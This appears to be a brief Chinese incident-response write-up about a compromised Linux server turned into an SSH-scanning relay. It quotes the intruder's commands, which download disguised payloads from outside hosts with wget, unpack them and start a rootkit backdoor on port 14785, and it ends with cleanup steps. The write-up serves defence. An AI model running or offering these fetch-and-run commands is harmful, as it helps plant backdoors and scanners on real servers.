http://www.myhack58.com/Article/48/66/2012/35805.htm
http://edu.21cn.com/linux/g_188_704380-1.htm
客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下 黑客进入服务器后所做的操作: 1. 向/var/tmp/下上传了两个恶意程序 其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。 2. 入侵者登陆记录 85.120.78.140的IP来自罗马尼亚。 3. wget http://pinky.clan.su/scan/wtf.jpg ; tar zxvf wtf.jpg wget adelinuangell.lx.ro/ryo.tar tar xvf ryo.tar cd .access.log 。/config Ady 14785 。/run 结束进程。删掉程序。。删掉用户。修改root密码。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
